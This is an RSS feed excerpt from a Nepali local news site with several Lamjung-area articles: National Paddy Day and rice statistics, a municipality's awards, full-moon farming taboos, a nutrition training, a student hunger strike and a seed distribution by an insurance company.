यो वर्ष ‘असारे भाका’को संरक्षणका लागि छायाँकंनको कार्यक्रम गर्ने तयारी गरेको ठाडोभाका लोककला प्रतिष्ठान नेपालले असार १५ गते पूर्णिमा तिथि परेको थाहा पाएपनि सो कार्यक्रम रद्द गरेको छ । ठाडोभाका लोककला प्रतिष्ठान नेपालले लोपोन्मुख लोक संस्कृतिको संरक्षण अभियान सञ्चालन गरिरहेको छ । यो वर्ष असार १५ गने मनाइने धान दिवसका दिन लोपोन्मुख ‘असारे भाका’को संरक्षण गर्नका लागि छायाँकंनको कार्यक्रम राख्ने तयारी गरेको थियो । तर पूर्णिमा तिथि परेको जानकारी आएपछि उक्त कार्यक्रम रद्द गरिएको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले बताउनु भयो । उहाँका अनुसार प्रतिष्ठानको मूल उद्देश्य लोक संस्कृतिको संरक्षण र प्रवर्द्धन गर्ने हो । संस्कृतिकै महत्वको दिन पूर्णिमा परेर खनजोत गर्न हुन्न भनेपछि संस्कृतिका विरुद्धको कार्य कसरी गर्न सकिन्छ ? भन्ने भयो र कार्यक्रम नै रद्द गरियो उहाँले भन्नुभयो ।
‘जलवायुमैत्री प्रविधि, धानमा आत्मनिर्भरता र समृद्धि’ :
यो वर्ष ‘जलवायुमैत्री प्रविधि, धानमा आत्मनिर्भरता र समृद्धि’ भन्ने नाराका साथ २३ औँ राष्ट्रिय धान दिवस विभिन्न कार्यक्रमको आयोजना गरी मनाइँदै छ । कृषिको परनिर्भरता कम गर्न र किसानलाई हौसला पु¥याउन प्रत्येक वर्ष धान दिवस मनाइँदै आएको छ । नेपाल कृषि अनुसन्धान परिषद् (नार्क) को सिफारिसमा २०६१ साल मंसिर २९ गतेको मन्त्रिस्तरीय निर्णयबाट असार १५ गतेलाई धान दिवसका रुपमा मनाउन शुरु गरिएको हो ।
आजको दिनलाई दही चिउरा खाने दिनका रुपमा समेत लिइन्छ । आजको दिन दही चिउरा खानु संस्कृति नै बनेको छ ।
नेपाल कृषि अनुसन्धान परिषद् (नार्क) को खुमलटारस्थित राष्ट्रिय बाली विज्ञान अनुसन्धान केन्द्रमा विशेष समारोहका बिच महोत्सव मनाउन लागिएको हो ।
कृषि क्षेत्रबाट प्राप्त कूल गार्हस्थ्य उत्पादनमध्ये धानको योगदान १२ प्रतिशत छ । राष्ट्रिय उत्पादन (जिडिपी) मा कृषि क्षेत्रको योगदान भने ३३ प्रतिशत छ । धान नेपालको प्रमुख खाद्यान्न बाली हो । धानको उत्पादन बढ्दा कूल गार्हस्थ्य उत्पादनमा वृद्धि हुन्छ ।
जल, जमीन र जनशक्ति पर्याप्त भए पनि धानको उत्पादनमा सन्तोषजनक वृद्धि हुन सकेको छैन । युवा जनशक्ति विदेश पलायन हुनु, खेतीयोग्य जमीन खण्डीकरण भई घडेरीकरणमा रुपान्तरण हुनु पर्याप्त सिञ्चित जमीन नहुनु, उन्नत जातका बीउबिजनको प्रयोग नगर्नु र प्राङ्गारिक तथा रासायनिक मलको सही रुपमा प्रयोग नहुनु एवं धानको समर्थन मूल्य नतोकिनुले धानको उत्पादन बढ्न नसकेको कृषि विज्ञहरूको भनाइ छ ।
नेपालीहरू दुई छाक अनिवार्य नत्र तीनै छाक भए पनि भात खाने गर्छन् । सो बानीले गर्दा चामलको आयात बढेको छ । सरकारले भने धानको उत्पादन दोब्बर वृद्धि गर्ने लक्ष्य लिएको छ ।
खाद्यान्न उपभोग गर्ने जनशक्ति बढेसँगै उत्पादनको बढोत्तरी आवश्यक छ । तर नेपालमा भने कूल खेतीयोग्य जमीनमध्ये धेरै बाँझो छ । सरकारी तथ्याङ्कअनुसार करीब ३१ लाख हेक्टर जमीन खेतीयोग्य छ । उन्नत जात भित्र्याउने नाममा स्थानीय धानका जात प्रायः लोप भइसकेका छन् ।
नेपाल संसारकै अग्लो स्थानमा धान उत्पादन गर्ने देशमा पनि पर्छ । जुम्लाको छुमचौरमा उत्पादन हुने जुम्लीमार्सी धान विश्वमा प्रसिद्ध छ । तर, उक्त धान मागअनुसारको उत्पादन हुन सकेको छैन । नेपालको झापा जिल्लामा सबैभन्दा धेरै धान उत्पादन हुन्छ ।
राष्ट्रिय कृषि गणना २०७८ अनुसार नेपालका ४१ लाख ३१ हजार कृषक घरधुरीमध्ये २७ लाख ६५ हजार (करिब ६७ प्रतिशत) धान खेतीमा आबद्ध छन् । कुल खेतीयोग्य जमिनको ५४ प्रतिशत भूभागमा धान खेती हुने गरेको छ ।
नेपालमा वार्षिक १० लाख टन धान अपुग :
नेपालमा वार्षिक १० लाख टन धान अपुग हुने गरेको छ । कृषि विभागका अनुसार पछिल्ला पाँच वर्षको तथ्यांक हेर्दा धानको क्षेत्रफल क्रमशः घट्दै गए पनि उत्पादकत्वमा भने सुधार आएको छ ।
आ.व. २०७६/७७ मा प्रतिहेक्टर ३.८० मेट्रिक टन रहेको उत्पादकत्व वृद्धि भई आव २०८१/८२ मा ४.१९ मेट्रिक टन पुगेको छ । पछिल्लो वर्ष १४ लाख २० हजार हेक्टर क्षेत्रफलबाट ५९ लाख ५५ हजार मेट्रिक टन धान उत्पादन भएको थियो ।
नेपालको कुल आवश्यकता करिब ७० लाख मेट्रिक टन रहेको विश्लेषण छ । त्यसरी हेर्दा अझै वार्षिक १० लाख मेट्रिक टन धान अपुग हुने स्थिति छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49726 0
क्व्होलासोथार गाउँपालिकाद्वारा तीन कलाकारसहित १२ जनालाई सम्मान https://www.antaranganews.com/?p=49692 https://www.antaranganews.com/?p=49692#respond Sat, 27 Jun 2026 13:22:51 +0000 https://www.antaranganews.com/?p=49692 मालिङ(लमजुङ)– लमजुङको क्व्होलासोथार गाउँपालिका विभिन्न विधामा ख्याति कमाएका १२ जनालाई सम्मान सम्मान गरेको छ । गाउँसभाको २०औँ अधिवेशनअन्तर्गत आर्थिक वर्ष २०८३/८४ को नीति तथा कार्यक्रम र बजेटमाथिको छलफल कार्यक्रममा घलेगाउँमा असार ११ गते उनीहरुलाई सम्मान गरिएको हो ।
सम्मानित हुनुहुनेमा कृषि, शिक्षा, स्वास्थ्य, कर्मचारी सेवा, कला–संस्कृति, पूर्वाधार निर्माण तथा राजस्व संकलनका क्षेत्रमा उल्लेखनीय योगदान पु¥याएका १२ जना व्यक्तित्वहरु हुनुहुन्छ ।
सम्मानित हुनुहुनेमा कला तथा संस्कृतिको क्षेत्रमा योगदान पुर्याउनु हुने तीन जना हुनुहुन्छ । उहाँहरुमा वडा नं. ६ पसगाउँ घर भइ गण्डकी प्रज्ञा प्रतिष्ठानका पूर्व उपकुलपति समेत रहनु भएका लोकसंस्कृति अनुसन्धान तथा संरक्षणमा सक्रिय गोरे गुरुङ, गुरुङ फिल्म निर्देशक एवम् कलाकार वडानं. ४ भुजुङका कमलबहादुर गुरुङ र वडा नं. २ मालिङ घर रहेका कलाकार गजेन्द्र गुरुङ (जसबहादुर गुरुङ) हुनुहुन्छ ।
वडा नं. ३, घलेगाउँस्थित उत्तरकन्या मन्दिर शौचालय निर्माण उपभोक्ता समितिका अध्यक्ष नवराज घले, आर्थिक वर्ष २०८२/८३ मा गाउँपालिकाभित्र सबैभन्दा बढी राजस्व संकलन गरी आन्तरिक आय अभिवृद्धिमा योगदान पुर्याएका वडा नं. ६, पसगाउँलाई ‘उत्कृष्ट राजस्व संकलन वडा’ का रुपमा सम्मान गरिएको छ ।
यस्तै, वडा नं. ६ पसगाउँस्थित प्रगतिशील एकीकृत कृषि फार्मका सञ्चालक होमबहादुर गुरुङ र वडा नं. ४ भुजुङस्थित नमुना कृषि तथा पशुपन्छी फार्म सञ्चालन गर्ने कुलबहादुर विकलाई सम्मान गरिएको छ ।
वडा नं., बगुमस्थित घले उत्तरकन्या माविका शिक्षक उमलबहादुर विक र वडा नं. ९ गिलुङस्थित बुद्धोदय माविका शिक्षक प्रकाश उपरकोटीलाई पनि सम्मान गरिएको छ ।
यस्तै, एसईई २०८२ मा क्व्होलासोथार गाउँपालिकाबाट सबैभन्दा बढी ३.५४ जीपीए ल्याउने वडा नं. १ बाग्लुङपानीकी शेरप लामालाई सम्मान गरिएको छ ।
गाउँपालिकाले उत्कृष्ट कर्मचारीतर्फ पशु सेवा शाखामा कार्यरत रुपनारायण चौरसियालाई र स्वास्थ्य शाखामा कार्यरत मेडिकल अधिकृत डा. सागर थापालाई सम्मान गरेको छ ।
उहाँहरुलाई गाउँपालिका अध्यक्ष सूर्यप्रसाद गुरुङ, उपाध्यक्ष गमीमाया गुरुङ, प्रमुख प्रशासकीय अधिकृत माधवप्रसाद वाग्ले, वडा नं. ४ का वडाअध्यक्ष नारायण गुरुङसहित जनप्रतिनिधि र कर्मचारीले सम्मान गर्नु भएको थियो । उहाँहरुलाई २५ प्रतिशत करकट्टी गरेर जनही हजार रुपैयाँ नगद, दोसल्ला र सम्मानपत्र प्रदान गरिएको गाउँपालिकाका प्रमुख प्रशासकीय अधिकृत माधवप्रसाद वाग्लेले जानकारी दिनु भएको छ ।
गाउँपालिकाले अघिल्लो दिन पालिकाको नीति तथा कार्यक्रम तथा ३८ करोड ९३ लाख ६२ हजार २ सय ५ रुपैयाँको बजेट प्रस्तुत गरेको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49692 0
यो वर्षको राष्ट्रिय धान दिवस खल्लो हुने, पूर्णिमा पर्व परेको हुँदा खेतबारीमा खनजोतका काम गर्न नहुने शास्त्रीय मान्यता https://www.antaranganews.com/?p=49464 https://www.antaranganews.com/?p=49464#respond Fri, 19 Jun 2026 02:19:12 +0000 https://www.antaranganews.com/?p=49464 लमजुङ– यो वर्षको राष्ट्रिय धान दिवस खल्लो हुने भएको छ । असार १५ गते मनाईको सो दिवसका दिनमा पूर्णिमा पर्व परेको हुँदा खेतबारीमा हलो जोत्न खनजोत गर्न नहुने शास्त्रीय मान्यता सनातन संस्कृतिमा रहेको छ, त्यसैले यो बिना गोरु जोताईको धान दिवस खल्लो हुने भएको खुलासा हो ।
नेपाली किसानहरूका लागि असार १५ अर्थात् धान दिवस महत्वपूर्ण पर्व हो । नेपालमा किसानसँग सम्बन्धित संघ–संगठनहरूले यसलाई किसान दिवसको रुपमा लामो समयदेखि मनाउँदै आएका छन् । जिल्लामा कृषि विकास कार्यालयले दिवसको कार्यक्रम गर्ने गर्दछ । नेपाल सरकारले यस दिनलाई औपचारिक रुपमा धान दिवस घोषणा गरी १५ वर्षअघिदेखि मनाउन थालेपछि यस दिनको महत्व बढेको हो । त्यसैले असार १५ गते अर्थात धान दिवस एक उत्सवका रुपमा रहेको छ । तर गोरु जोताई बिनाको धान रोपाई कस्तो होला ? कौतुहलको विषय बनेको छ ।
मानो खाएर मुरी उब्जाउने उपमा लिइने असार महिनालाई असार १५ गते वर्षाको सुरुवात्, मुख्य वाली धानको रोपाइँका साथै हाम्रो संस्कृति र सभ्यतासँग गाँसिएको महत्वपूर्ण दिन मानिन्छ । यस दिनदेखि किसानहरू वर्षाको सुरुवात् भएको, समाजको मान प्रतिष्ठासँग जोडिएको सबैभन्दा मिठोमानीने खाद्यान्न धानको रोपाइँमा किसानहरू लाग्ने गर्दछन् । त्यही रोपाइँमा लाग्दाको खुशी र आनन्द अभिव्यक्त गर्ने एक सांस्कृतिक पर्व असार पन्ध्र बन्न गएको छ । तर सनातनीय संस्कार संस्कृति अनुसार पूर्णिमा र औंसीको दिनमा गोरु नजोत्ने प्रचलन छ ।
औंसीको दिनमा गोरु जोत्न मात्र नहुने होइन खेतबारीमा खनजोतका काम समेत गर्न हुँदैन पण्डित घनश्याम सुवेदीले बताउनु भयो । उहाँका अनुसार त्यस दिन चन्द्रमाबाट पृथ्वीमा अमृतको वर्षा हुन्छ भन्ने शास्त्रीय मान्यता रहेको छ । उहाँले भन्नुभयो, ‘त्यस दिन खनजोतको कामले बृष्टि अमृत धारण गर्न पृथ्वीलाई कठिन हुने, त्यसबाट पितृहरू र देवताहरू रिसाउछन् भन्ने छ ।’ जसका कारण अकाल मृत्यु, खडेरी पर्ने जस्ता अनिष्ट सिर्जने हुन्छ भन्ने शास्त्रमा उल्लेख छ सुवेदीले जानकारी दिनु भयो ।
यसैगरी, पूर्णिमा, औंसी तथा संक्रान्तिका दिनहरू दान पुण्य गर्ने दिन हुन्, त्यसैले ती दिनमा खेतबारीमा खनजोतका काम गर्नु हुँदैन भन्ने शास्त्रीय मान्यता रहेको हिन्दू जागरण अभियानका प्रणेता पण्डित रामकृष्ण उपाध्यायले बताउनु भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49464 0
नसर्ने रोग न्यूनीकरण, पोषण तथा मिक्स सातु बनाउने चार दिने तालिम समापन https://www.antaranganews.com/?p=48856 https://www.antaranganews.com/?p=48856#respond Mon, 18 May 2026 13:17:55 +0000 https://www.antaranganews.com/?p=48856 सुन्दरबजार(लमजुङ)– लमजुङमा नसर्ने रोग न्यूनीकरण, पोषण तथा मिक्स सातु बनाउने सम्बन्धी चार दिने तालिम समापन गरिएको छ । भोटेओडार सामुदायिक सिकाइ केन्द्र, सुन्दरबजार– ९ को आयोजना तथा HDCS– नमूना सामुदायिक अस्पतालद्वारा सञ्चालित Step Up and Scale Up परियोजनाको प्राविधिक सहयोगमा सञ्चालन ‘असल खानपानमा सुधार तथा मिक्स सातु बनाउने तालिम– २०८३’ जेठ ४ गते सम्पन्न भएको हो ।
सुन्दरबजार नगरपालिका– ७, ८ र ९ अन्तर्गत रहेका सामुदायिक तथा निजी विद्यालयका प्रतिनिधिहरू, महिला स्वास्थ्य स्वयंसेविकाहरू तथा समुदायका महिला– पुरुषका लागि सो तालिम दिइएको हो ।
नसर्ने रोग न्यूनीकरण तथा स्वस्थ जीवनशैली प्रवर्धन गर्ने उद्देश्यले सञ्चालन गरिएको उक्त तालिममा गरी १८ जनाले भाग लिएको भोटेओडार सामुदायिक सिकाइ केन्द्रका अध्यक्ष मधुकुमारी भट्टराईले बताउनु भयो । उहाँका अनुसार कार्यक्रमका प्रमुख अतिथि सुन्दरबजार नगरपालिकाका मेयर कृष्ण प्रसाद कोइरालाले प्रशिक्षणका सहभागीहरूलाई तालिममा सहभागिताको प्रमाणपत्र वितरण गर्नु भएको थियो ।
प्रमाणपत्र वितरण पछि प्रमुख अतिथि कोइरालाले पछिल्लो समय बढ्दो मधुमेह, उच्च रक्तचाप, मुटुरोग लगायतका नसर्ने रोग न्यूनीकरणका लागि स्वस्थ खानपान र जीवनशैलीमा सुधार अत्यन्त आवश्यक रहेको बताउनुभयो । उहाँले स्थानीयस्तरमा उपलब्ध खाद्य सामग्रीको सदुपयोग गर्दै पोषणयुक्त आहारको प्रयोग बढाउन यस्ता तालिम प्रभावकारी हुने हुँदा प्राप्त सीपको उपयोग गनै सहभागीहरूलाई आग्रह गर्नुभयो ।
सो तालिममा खाद्य प्रविधि तथा गुण नियन्त्रण डिभिजन कार्यालय, तनहुँका प्रमुख तथा खाद्य अनुसन्धान अधिकृत ज्योती आचार्य मुख्य प्रशिक्षकको रूपमा रहनुभएको थियो । आचार्यले मिक्स सातु बनाउने सैद्धान्तिक र प्रयोगात्मक विधिबारेमा जानकारी दिदै व्यवसायिकताका लागि समेत प्रयोग गर्न सकिने जानकारी दिनुभयो । उहाँले व्यवसायिक प्रयोगमा नभए पनि आफ्नो घरमा बालबालिका, बृद्धबृद्धा तथा वयस्कले समेत यसको सेवन गर्न सक्ने बताउनु भयो । सातु उत्पादन गरेपछि त्यसको प्याकेजिङ विधि, गुणस्तर कायम, ब्राण्डिङ गर्ने लगायतका विषयमा जानकारी दिनु भएको थियो ।
त्यस्तै, नसर्ने रोग न्यूनीकरणका लागि उहाँले शुद्ध पिउने पानीको प्रयोग गर्ने, रङ्ग राखेका फलफूल नखाने साथै सुनपानी राखेर पकाएको केरा समेत सेवन गर्न नहुने जानकारी दिनु भएको थियो ।

चार दिने सो तालिम अवधिभर सहभागीहरूलाई स्थानीय स्रोत र साधनको प्रयोग गरी मिक्स सातु तथा विभिन्न पोषणयुक्त परिकार बनाउन सैद्धान्तिक तथा प्रयोगात्मक प्रशिक्षण प्रदान गरिएको थियो । साथै स्वस्थ खानपान, सन्तुलित आहार तथा दैनिक जीवनशैली सुधार सम्बन्धी जानकारीसमेत दिइएको थियो ।

कार्यक्रममा सहभागीहरूलाई तालिममा सिकेका सीपलाई व्यवसायमा रूपान्तरण गर्न प्रोत्साहित गरिएको थियो । स्थानीयस्तरमै उपलब्ध स्रोत साधनको उपयोग गरी सर्वोत्तम पिठो तथा पोषणयुक्त खाद्य सामग्री उत्पादनमार्फत स्वरोजगार र आयआर्जनका अवसर सिर्जना गर्न सकिने विषयमा समेत सहजीकरण गरिएको आयोजकको भनाइ छ ।
जेठ १ गतेदेखि सुरु भई ४ गते सम्पन्न भएको उक्त तालिम HDCS– नमुना सामुदायिक अस्पतालका मनोबिमर्सदाता तथा कार्येक्रम संयोजक शोभा ठकुरीको नेतृत्वमा सञ्चालन भएको थियो । समापन कार्यक्रमको अध्यक्षता भोटेओडार सामुदायिक सिकाइ केन्द्रका अध्यक्ष मधुकुमारी भट्टराईले गर्नुभएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=48856 0
लमजुङ क्याम्पसका विद्यार्थीहरूको रिले अनसन विदाको दिन र रातमा पनि जारी https://www.antaranganews.com/?p=39107 https://www.antaranganews.com/?p=39107#respond Sat, 21 Mar 2026 12:06:50 +0000 https://www.antaranganews.com/?p=39107 सुन्दरबजार(लमजुङ)– लमजुङको सुन्दरबजार स्थित लमजुङ कृषि क्याम्पसमा चौथो सत्रान्त्रका सम्पूर्ण विद्यार्थीहरू सुरु गरेको रिले अनसन शनिबार विदा र रातका समयमा पनि जारी रहेको छ । अनसनको आज शनिबार तेस्रो दिन हो । डिन कार्यालयले आफ्ना मागको वेवास्ता गरेकोले अनसनलाई निरन्तरता दिन बाध्य हुनु परेको अनसनरत विद्यार्थीहरूले चैत ७ गते साँझ ५ः३० बजे बताएका छन् ।
लमजुङ क्याम्पसमा जेनजी आन्दोलनका बेला सबै प्रकारका विद्यार्थी संघ संगठन खारेज गरिएको घोषणा गरिएको हुँदा यतिबेला उक्त क्याम्पसमा कुनै पनि राजनीतिक दलको भातृ संघसंगठन कार्यरत छैनन् ।
उनीहरू चैत ५ गते विहान १० बजेदेखि अनसनमा उत्रिएका हुन् । परीक्षा तालिका सहमति बेगर तलमाथि गरिएको सम्बन्धमा माघ २६ गतेदेखि फागुन ११ गतेसम्म गरिएको तालाब्दी खुलाउने सन्दर्भमा भएको सहमतिको उल्लंघन भएको भन्दै विद्यार्थीहरूले अनसन गरेका हुन् । क्याम्पस प्रशासनले पूर्वसहमति उल्लंघन गरेकोमा गम्भीर आपत्ति तथा कडा विरोध जनाउँदै विद्यार्थीहरूले सो दिन एक प्रेस विज्ञप्ति जारी गरी रिले अनसन सुरु गर्नु परेको बताएका थिए । सोही अनसनको क्रम आज तेस्रो दिन पनि जारी रहेको हो । विद्यार्थीहरूले आफ्नो मागको सम्बोधन नहुँदासम्म अनसन जारी राख्ने प्रतिवद्धता व्यक्त गरेका छन् । उनीहरूले एक स्वरमा भने, ‘हामी विदाको दिनमा मात्र हैन रातको समयमा पनि अनसन मै छौं ।’
लेखा अधिकृत रामजी खड्काको असामयिक निधन :
उक्त संकायमा कुल १०५ जना विद्यार्थी रहेका जानकारी दिदै आफूहरूले प्रति चरणमा १२ जनाका दरले अनसन बस्ने गरेको विद्यार्थी प्रतिनिधि अवसर अधिकारीले जानकारी दिनु भयो ।उहाँका अनुसार आज क्याम्पसका लेखा अधिकृत रामजी खड्काको असामयिक निधन भयो । सो कारण दिवंगत आत्माप्रति भावपूर्ण श्रद्धाञ्जली अर्पण गर्न धेरै साथीहरू मलामी भएर त्यता गएको हुँदा पनि अनसनमा कम साथी देखिएका हुन् । उहाँले भन्नुभयो, ‘रातको समयमा भने छात्राहरू बसेका छैनन् ।’

लमजुङ क्याम्पसको चौथो सत्रान्त्रका विद्यार्थीहरूले विभिन्न प्रशासनिक कमजोरीका कारण परीक्षा दिन सक्ने अवस्था नरहेको भन्दै गरेको तालाबन्दी फागुन ११ गते मौखिक एवम् लिखित सम्झौता गरी खोल्ने निर्णय भएको थियो । तर त्यो सहमतिको उल्लंघन भएको सो संकायका विद्यार्थी प्रतिनिधि अवसर अधिकारीको भनाइ छ । उहाँका अनुसार त्यस समयमा सम्बन्धित माथिल्लो निकायबाट समेत ग्रिन सिग्नल आएको भनेर विभिन्न संकाय, स्वतन्त्र विद्यार्थी यूनियनका काबा सभापति आशीष पौडेल, क्याम्पस प्रमुख डा. रामकुमार श्रेष्ठ एवम् म सहितका विद्यार्थी प्रतिनिधि महेश बुढा, अदिति ज्ञवाली आदि बिच सम्झौता भएको थियो तर त्यो सहमति ऐले उल्लंघन भएको अनसनरत विद्यार्थीहरूको दावी छ ।
विद्यार्थीहरूले पटक पटक चासो राख्दा पनि क्याम्पस प्रमुख श्रेष्ठले आफ्नै हस्ताक्षरको समेत अवमूल्यन गरी जिम्मेवारीबाट पछि हट्न खोज्नुभएको देख्दा हामी अचम्मित छौं, आश्चर्यचकित भइ अनसन गर्न बाध्य भएका हांै अधिकारीको भनाइ छ ।
यसबारेमा क्याम्पस प्रशासनमा सम्पर्कको प्रयास गर्दा आज बिदाको दिनमा जिम्मेवार सरहरू कोही नभएको जानकारी दिइएको छ ।
यसअघि एक विज्ञप्ति जारी गरी आफूहरू माग पुरा नहुँदासम्म रिले अनसन बस्ने उनीहरूले क्याम्पस प्रशासन, डिनको कार्यालय, विद्यार्थी युनियन आदिलाई बोधार्थ समेत दिएका थिए । यतिबेला भने डिन कार्यालयबाट विद्यार्थीका मागबारेमा आलटाल गर्ने काम भएको बताइएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=39107 0
तेस्रो वार्षिकोत्सवमा कृषि हाटबजारमा जीवन विमा सचेतना सहित किसानलाई तरिकारीको बीउ निःशुल्क बितरण https://www.antaranganews.com/?p=37603 https://www.antaranganews.com/?p=37603#respond Thu, 01 Jan 2026 12:45:39 +0000 https://www.antaranganews.com/?p=37603 सुन्दरबजार(लमजुङ)– लिबर्टी माइक्रो लाइफ इन्स्योरेन्स लिमिटेडको तेस्रो वार्षिकोत्सवको पावन अवसरमा लिबर्टी माइक्रो लाइफ इन्स्योरेन्स लि.ले कृषि हाटबजारमा जीवन विमा सचेतना एवम् किसानलाई तरिकारीको बीउ निःशुल्क बितरण कार्यक्रम गरिएको छ । सुन्दरबजारको आयोजनामा लमजुङको व्यावसायिक एवम् शैक्षिक केन्द्र सुन्दरबजारमा लिबर्टी माइक्रो लाइफ इन्स्योरेन्स लि.को आयोजनामा सो कार्यक्रम पुस १७ गते गरिएको हो ।
कार्यक्रममा सुन्दरबजार नगरपालिका– ७ का वडा अध्यक्ष जयराम रेग्मीले कार्यक्रममा सहभागी २७ जना किसानलाइ तरिकारीको बीउ वितरण गर्नु भएको थियोे । आफ्नो शुभकामना मन्तव्यमा वडाध्यक्ष रेग्मीले जोखिम बहनका साथै स–साना बचतका लागि बिमामा जोड दिदै लिबर्टी माइक्रो लाइफले आफ्नो व्यवसायिक सामाजिक उत्तरदायीत्व अन्तरगत यसरी बीउ बिजन वितरण गरेकोले आफू र वडाकोतर्फबाट आभार प्रकट गर्नु भयो । कार्यक्रममा सहभागी किसानहरूलाई अकबरे खुर्सानी, मुला, लौका, काक्रो, घिरौला, फर्सी, बोडी, करेला, धनियाँ, रायो मार्फा, चम्सुर पालुङो लगायतका बीउ निःशुल्क वितरण गरिएको थियो ।
सो अवसरमा कार्यक्रममा सहभागी सुन्दरबजार नगरपालिका– ३ निवासी ध्रुब मिश्रले विमाको पहुँच हाम्रो जस्तो ग्रामीण क्षेत्रमा पुर्याउन यस्तो कार्यक्रमले निरन्तरता पाउनु पर्ने बताउनु भयो । सुन्दरबजार नगरपालिका वडा नम्बर ४ का किसान अम्बिका बसेलले आफूले अहिलेसम्म बिमा नगरेको तर छिटोभन्दा छिटो गर्ने बताउनु भयो ।

किसान शिव पौडेलले जीवन बिमा हाम्रो लागि स्थापित भएकोले कृषि उपज बिक्रिबाट बचेको केही रकम बिमा गर्न छुट्याएको र सहभागीहरूलाई पनि त्यस्तो सल्लाह दिन चाहन्छु भन्नुभयो । किसान रामचन्द्र नेउपानेले विमा खर्च नभई लगानी हो भन्दै जीवन बिमा आफूले गरेको र अब सपरिवार गर्ने जानकारी दिनु भयो । जीवन बिमा शिक्षा फैलाउने उद्देश्यले सो कार्यक्रमको आयोजना गरिएको आयोजक संस्थाका सुन्दरबजार शाखा प्रमुख मेनुका श्रेष्ठले बताउनु भयो ।
कार्यक्रममा लघु जीवन विमाको महत्त्व, फाइदा, प्रकार आदि बिषयमा अन्तक्र्रीया तथा छलफल गरिएको थियोे । सो अवसरमा एभरेष्ट साकोसका अध्यक्ष रामबाबु श्रेष्ठ, सुन्दरबजार चेम्बर अफ कमर्सका अध्यक्ष बिष्णुकुमार श्रेष्ठ, एभरेष्ट साकोसका सञ्चालक समितिका सदस्य अम्बिकाप्रसाद पण्डित, एभरेष्ट साकोसका प्रबन्धक ज्ञानबहादुर नेपाली लगायतको सहभागिता थियोे ।
कार्यक्रममा भाग लिन आउनु भएका ६२ बर्षीय किसान श्रीभद्र अधिकारीको अध्यक्षतामा भएको थियोे । सो कार्यक्रम लिबर्टी माइक्रो लाइफ इन्सोरेन्स सुन्दरबजार प्रमुख मेनुका श्रेष्ठले सञ्चालन गर्नु भएको थियोे ।

]]>
https://www.antaranganews.com/?feed=rss2&p=37603 0